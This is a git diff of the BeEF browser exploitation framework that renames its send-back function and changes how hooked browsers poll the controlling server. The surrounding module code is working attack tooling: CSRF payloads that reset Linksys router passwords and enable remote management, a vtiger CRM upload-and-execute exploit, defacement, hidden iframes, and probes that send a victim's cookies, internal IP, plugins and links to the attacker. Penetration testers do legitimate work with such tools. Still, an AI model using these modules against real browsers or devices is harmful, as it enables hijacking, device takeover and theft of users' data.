a5e8e6e55..a33d50a17 100644 --- a/modules/beefjs/updater.js +++ b/modules/beefjs/updater.js @@ -33,7 +33,7 @@ beef.updater = { if (beef.logger.running) { beef.logger.queue(); } - beef.net.flush_queue(); + beef.net.flush(); if(beef.commands.length > 0) { this.execute_commands(); } else { @@ -47,35 +47,17 @@ beef.updater = { get_commands: function(http_response) { try { this.lock = true; - beef.net.request( - beef.net.beef_url + beef.net.beef_hook, - 'POST', - function(response, textStatus) { - if(response != null && response.length > 0) { - beef.updater.execute_commands(); - } - }, - beef.updater.build_updater_params() - ); + beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 10, 'script', function(response) { + if (response.body != null && response.body.length > 0) + beef.updater.execute_commands(); + }); } catch(e) { this.lock = false; return; } - this.lock = false; }, - // Builds the POST parameters to send back to the framework when requesting new commands. - build_updater_params: function() { - ret = 'beef_js_cmps=' + beef.components.join(',') - - for(key in this.objects) { - ret += '&' + key + '=' + escape(this.objects[key]); - } - - return ret; - }, - // Executes the received commands if any. execute_commands: function() { if(beef.commands.length == 0) return; @@ -95,4 +77,4 @@ beef.updater = { } } -beef.regCmp('beef.updater'); \ No newline at end of file +beef.regCmp('beef.updater'); diff --git a/modules/commands/browser/detect_details/detect_details.js b/modules/commands/browser/detect_details/detect_details.js index 7be854e2f..72226a156 100644 --- a/modules/commands/browser/detect_details/detect_details.js +++ b/modules/commands/browser/detect_details/detect_details.js @@ -50,13 +50,13 @@ function serialize(_obj) } } - var plugins = escape(beef.browser.getPlugins()); - var browser_type = escape(serialize(beef.browser.type())); + var plugins = beef.browser.getPlugins(); + var browser_type = serialize(beef.browser.type()); var java_enabled = (beef.browser.hasJava())? "Yes" : "No"; var vbscript_enabled = (beef.browser.hasVBScript())? "Yes" : "No"; var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; var has_googlegears = (beef.browser.hasGoogleGears())? "Yes" : "No"; - var screen_params = escape(serialize(beef.browser.getScreenParams())); - var window_size = escape(serialize(beef.browser.getWindowSize())); - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'plugins='+plugins+'&java_enabled='+java_enabled+'&vbscript_enabled='+vbscript_enabled+'&has_flash='+has_flash+'&has_googlegears='+has_googlegears+'&browser_type='+browser_type+'&screen_params='+screen_params+'&window_size='+window_size); -}); \ No newline at end of file + var screen_params = serialize(beef.browser.getScreenParams()); + var window_size = serialize(beef.browser.getWindowSize()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'plugins='+plugins+'&java_enabled='+java_enabled+'&vbscript_enabled='+vbscript_enabled+'&has_flash='+has_flash+'&has_googlegears='+has_googlegears+'&browser_type='+browser_type+'&screen_params='+screen_params+'&window_size='+window_size); +}); diff --git a/modules/commands/browser/detect_visited_urls/detect_visited_urls.js b/modules/commands/browser/detect_visited_urls/detect_visited_urls.js index 75e178c3a..42a259d3c 100644 --- a/modules/commands/browser/detect_visited_urls/detect_visited_urls.js +++ b/modules/commands/browser/detect_visited_urls/detect_visited_urls.js @@ -5,6 +5,6 @@ beef.execute(function() { { comp += results[i].url+' = '+results[i].visited+' '; } - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result="+comp); + beef.net.send("<%= @command_url %>", <%= @command_id %>, comp); }); diff --git a/modules/commands/browser/link_rewrite/link_rewrite.js b/modules/commands/browser/link_rewrite/link_rewrite.js index 64681dde0..0bca8f0cc 100644 --- a/modules/commands/browser/link_rewrite/link_rewrite.js +++ b/modules/commands/browser/link_rewrite/link_rewrite.js @@ -1,4 +1,4 @@ beef.execute(function() { - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinks('<%= @url %>', '<%= @selector %>')+' links rewritten to <%= @url %>'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinks('<%= @url %>', '<%= @selector %>')+' links rewritten to <%= @url %>'); }); diff --git a/modules/commands/browser/site_redirect/site_redirect.js b/modules/commands/browser/site_redirect/site_redirect.js index 2903508e4..08f25a049 100644 --- a/modules/commands/browser/site_redirect/site_redirect.js +++ b/modules/commands/browser/site_redirect/site_redirect.js @@ -1,6 +1,6 @@ beef.execute(function() { - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape('Redirected to: <%= @redirect_url %>'), function(){window.location = "<%= @redirect_url %>"}); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape('Redirected to: <%= @redirect_url %>'), function(){window.location = "<%= @redirect_url %>"}); }); diff --git a/modules/commands/browser/site_redirect_iframe/site_redirect_iframe.js b/modules/commands/browser/site_redirect_iframe/site_redirect_iframe.js index 2d3b21cf5..4b58f4c19 100644 --- a/modules/commands/browser/site_redirect_iframe/site_redirect_iframe.js +++ b/modules/commands/browser/site_redirect_iframe/site_redirect_iframe.js @@ -7,15 +7,15 @@ beef.execute(function() { $j("iframe").remove(); - beef.dom.createIframe('fullscreen', 'get', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); } }); + beef.dom.createIframe('fullscreen', 'get', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); } }); setTimeout(function() { if(!sent) { result = 'Iframe failed to load, timeout'; - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); document.title = iframe_src + " is not available"; sent = true; } }, <%= @iframe_timeout %>); -}); \ No newline at end of file +}); diff --git a/modules/commands/host/insecure_url_skype/insecure_url_skype.js b/modules/commands/host/insecure_url_skype/insecure_url_skype.js index d65cf5d9d..53fc9bc2a 100644 --- a/modules/commands/host/insecure_url_skype/insecure_url_skype.js +++ b/modules/commands/host/insecure_url_skype/insecure_url_skype.js @@ -1,5 +1,5 @@ beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = 'skype:<%= @tel_num %>?cal'; - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!"); }); diff --git a/modules/commands/host/iphone_tel/iphone_tel.js b/modules/commands/host/iphone_tel/iphone_tel.js index 40b39df1e..a2be81813 100644 --- a/modules/commands/host/iphone_tel/iphone_tel.js +++ b/modules/commands/host/iphone_tel/iphone_tel.js @@ -1,5 +1,5 @@ beef.execute(function() { document.body.innerHTML = ""; - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!"); }); diff --git a/modules/commands/host/physical_location/physical_location.js b/modules/commands/host/physical_location/physical_location.js index de635f0a3..784609b4b 100644 --- a/modules/commands/host/physical_location/physical_location.js +++ b/modules/commands/host/physical_location/physical_location.js @@ -1,7 +1,7 @@ beef.execute(function() { if(!beef.geolocation.isGeolocationEnabled()){ - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "geoLocEnabled=FALSE&latitude=&longitude="); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "geoLocEnabled=FALSE&latitude=&longitude="); return; } diff --git a/modules/commands/misc/alert_dialog/alert_dialog.js b/modules/commands/misc/alert_dialog/alert_dialog.js index 1e19b252c..2b03ecd33 100644 --- a/modules/commands/misc/alert_dialog/alert_dialog.js +++ b/modules/commands/misc/alert_dialog/alert_dialog.js @@ -1,5 +1,5 @@ beef.execute(function() { alert("<%== format_multiline(@text) %>"); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "text=<%== format_multiline(@text) %>"); -}); \ No newline at end of file + beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%== format_multiline(@text) %>"); +}); diff --git a/modules/commands/misc/deface_web_page/deface_web_page.js b/modules/commands/misc/deface_web_page/deface_web_page.js index 85245de42..b37d1a76d 100644 --- a/modules/commands/misc/deface_web_page/deface_web_page.js +++ b/modules/commands/misc/deface_web_page/deface_web_page.js @@ -1,5 +1,5 @@ beef.execute(function() { document.body.innerHTML = "<%= @deface_content %>"; - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=Deface Succesfull"); -}); \ No newline at end of file + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Succesfull"); +}); diff --git a/modules/commands/misc/prompt_dialog/prompt_dialog.js b/modules/commands/misc/prompt_dialog/prompt_dialog.js index e9678215a..b00965044 100644 --- a/modules/commands/misc/prompt_dialog/prompt_dialog.js +++ b/modules/commands/misc/prompt_dialog/prompt_dialog.js @@ -1,5 +1,5 @@ beef.execute(function() { var answer = prompt("<%== @question %>","") - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'answer='+escape(answer)); -}); \ No newline at end of file + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+escape(answer)); +}); diff --git a/modules/commands/misc/raw_javascript/raw_javascript.js b/modules/commands/misc/raw_javascript/raw_javascript.js index c97c71669..37c299dd8 100644 --- a/modules/commands/misc/raw_javascript/raw_javascript.js +++ b/modules/commands/misc/raw_javascript/raw_javascript.js @@ -8,11 +8,11 @@ beef.execute(function() { result+= n + " " + e[n] + "\n"; } - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); }); - \ No newline at end of file + diff --git a/modules/commands/misc/replace_video/replace_video.js b/modules/commands/misc/replace_video/replace_video.js index 382caacf0..41bd4fe06 100644 --- a/modules/commands/misc/replace_video/replace_video.js +++ b/modules/commands/misc/replace_video/replace_video.js @@ -11,5 +11,5 @@ beef.execute(function() { } ) - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=Replace Video Succesfull"); -}); \ No newline at end of file + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace Video Succesfull"); +}); diff --git a/modules/commands/misc/rickroll/rickroll.js b/modules/commands/misc/rickroll/rickroll.js index 3d34dd780..5b8dc4c6b 100644 --- a/modules/commands/misc/rickroll/rickroll.js +++ b/modules/commands/misc/rickroll/rickroll.js @@ -6,5 +6,5 @@ beef.execute(function() { $j('body').html(''); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Succesfull"); -}); \ No newline at end of file + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Succesfull"); +}); diff --git a/modules/commands/network/detect_local_settings/detect_local_settings.js b/modules/commands/network/detect_local_settings/detect_local_settings.js index 62bf65bd3..b759d3672 100644 --- a/modules/commands/network/detect_local_settings/detect_local_settings.js +++ b/modules/commands/network/detect_local_settings/detect_local_settings.js @@ -4,7 +4,7 @@ beef.execute(function() { var internal_hostname = beef.net.local.getLocalHostname(); if(internal_ip && internal_hostname) { - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'internal_ip='+internal_ip+'&internal_hostname='+escape(internal_hostname)); } -}); \ No newline at end of file +}); diff --git a/modules/commands/network/linksys_befsr41_csrf/befsr41_csrf.js b/modules/commands/network/linksys_befsr41_csrf/befsr41_csrf.js index ebc65e252..a43eac2bf 100644 --- a/modules/commands/network/linksys_befsr41_csrf/befsr41_csrf.js +++ b/modules/commands/network/linksys_befsr41_csrf/befsr41_csrf.js @@ -1,5 +1,5 @@ beef.execute(function() { var iframe = beef.dom.createInvisibleIframe(); iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); }); diff --git a/modules/commands/network/linksys_wrt54g2_csrf/wrt54g2_csrf.js b/modules/commands/network/linksys_wrt54g2_csrf/wrt54g2_csrf.js index 4d468f076..746f8076b 100644 --- a/modules/commands/network/linksys_wrt54g2_csrf/wrt54g2_csrf.js +++ b/modules/commands/network/linksys_wrt54g2_csrf/wrt54g2_csrf.js @@ -88,5 +88,5 @@ beef.execute(function() { iframe.contentWindow.document.body.appendChild(form); form.submit(); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); }); diff --git a/modules/commands/network/linksys_wrt54g_csrf/wrt54g_csrf.js b/modules/commands/network/linksys_wrt54g_csrf/wrt54g_csrf.js index 310135a60..2100fb4de 100644 --- a/modules/commands/network/linksys_wrt54g_csrf/wrt54g_csrf.js +++ b/modules/commands/network/linksys_wrt54g_csrf/wrt54g_csrf.js @@ -88,5 +88,5 @@ beef.execute(function() { iframe.contentWindow.document.body.appendChild(form); form.submit(); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); }); diff --git a/modules/commands/network/vtiger_crm_upload_exploit/vtiger_crm_upload_exploit.js b/modules/commands/network/vtiger_crm_upload_exploit/vtiger_crm_upload_exploit.js index 9a1c62f3b..236865722 100644 --- a/modules/commands/network/vtiger_crm_upload_exploit/vtiger_crm_upload_exploit.js +++ b/modules/commands/network/vtiger_crm_upload_exploit/vtiger_crm_upload_exploit.js @@ -12,7 +12,7 @@ beef.execute(function() { if (document.getElementById('vtigerimg')) { //document.body.removeChild(document.getElementById('vtigerimg')); - //beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!'); + //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!'); return "Exploit running already"; } @@ -125,15 +125,15 @@ beef.execute(function() { if (uploadstate == 0) { //something went way wrong document.body.removeChild(document.getElementById('vtigerimg')); - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload'); } else if (uploadstate == 1) { //we never got a response from the server document.body.removeChild(document.getElementById('vtigerimg')); - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file'); } else if (uploadstate == 2) { //we got a response that was NOT a 200 document.body.removeChild(document.getElementById('vtigerimg')); - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file'); } else if (uploadstate == 3) { //We got a 200, so hopefully the file was uploaded //be_graceful(); @@ -166,7 +166,7 @@ beef.execute(function() { http_request.send(requestbody); if (http_request.status == 200) { document.body.removeChild(document.getElementById('vtigerimg')); - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')'); return; } diff --git a/modules/commands/persistence/iframe_above/iframe_above.js b/modules/commands/persistence/iframe_above/iframe_above.js index a2e32c1a5..31529f070 100644 --- a/modules/commands/persistence/iframe_above/iframe_above.js +++ b/modules/commands/persistence/iframe_above/iframe_above.js @@ -1,4 +1,4 @@ beef.execute(function() { beef.session.persistant(); - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.'); }); diff --git a/modules/commands/persistence/popunder_window/popunder_window.js b/modules/commands/persistence/popunder_window/popunder_window.js index 19a74900d..b82392a45 100644 --- a/modules/commands/persistence/popunder_window/popunder_window.js +++ b/modules/commands/persistence/popunder_window/popunder_window.js @@ -6,5 +6,5 @@ beef.execute(function() { window.focus(); - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result)); }); diff --git a/modules/commands/recon/collect_links/collect_links.js b/modules/commands/recon/collect_links/collect_links.js index 5ab28579c..2bcc776bf 100644 --- a/modules/commands/recon/collect_links/collect_links.js +++ b/modules/commands/recon/collect_links/collect_links.js @@ -1,6 +1,6 @@ beef.execute(function() { - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "links="+escape(beef.dom.getLinks().toString())); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "links="+escape(beef.dom.getLinks().toString())); }); diff --git a/modules/commands/recon/detect_cookies_support/detect_cookies.js b/modules/commands/recon/detect_cookies_support/detect_cookies.js index d4b9a9486..a85563b0e 100644 --- a/modules/commands/recon/detect_cookies_support/detect_cookies.js +++ b/modules/commands/recon/detect_cookies_support/detect_cookies.js @@ -3,7 +3,7 @@ beef.execute(function() { var sessionResult = beef.browser.cookie.hasSessionCookies("<%= @cookie %>"); var persistentResult = beef.browser.cookie.hasPersistentCookies("<%= @cookie %>"); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "has_session_cookies="+sessionResult+ - "&has_persistent_cookies="+persistentResult+"&cookie=<%= @cookie %>"); + var results = {'has_session_cookies': sessionResult, 'has_persistent_cookies':persistentResult, 'cookie':'<%= @cookie %>'} + beef.net.send("<%= @command_url %>", <%= @command_id %>, results); }); diff --git a/modules/commands/recon/detect_tor/detect_tor.js b/modules/commands/recon/detect_tor/detect_tor.js index a0946b1ef..af7134d58 100644 --- a/modules/commands/recon/detect_tor/detect_tor.js +++ b/modules/commands/recon/detect_tor/detect_tor.js @@ -23,11 +23,11 @@ beef.execute(function() { setTimeout(function() { var img = document.getElementById('torimg'); if (img.getAttribute("attr") == "error") { - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not behind Tor'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not behind Tor'); } else if (img.getAttribute("attr") == "load") { - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Browser is behind Tor'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is behind Tor'); } else if (img.getAttribute("attr") == "start") { - beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result=Browser timed out. Cannot determine if browser is behind Tor'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser timed out. Cannot determine if browser is behind Tor'); }; document.body.removeChild(img); }, <%= @timeout %>); diff --git a/modules/commands/recon/event_logger/event_logger.js b/modules/commands/recon/event_logger/event_logger.js index 3d05493bd..a348bee1e 100644 --- a/modules/commands/recon/event_logger/event_logger.js +++ b/modules/commands/recon/event_logger/event_logger.js @@ -1,5 +1,5 @@ beef.execute(function() { beef.logger.start(); - beef.net.sendback("<%= @command_url %>", <%= @command_id %>, 'result=Event logger has been started'); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=Event logger has been started'); });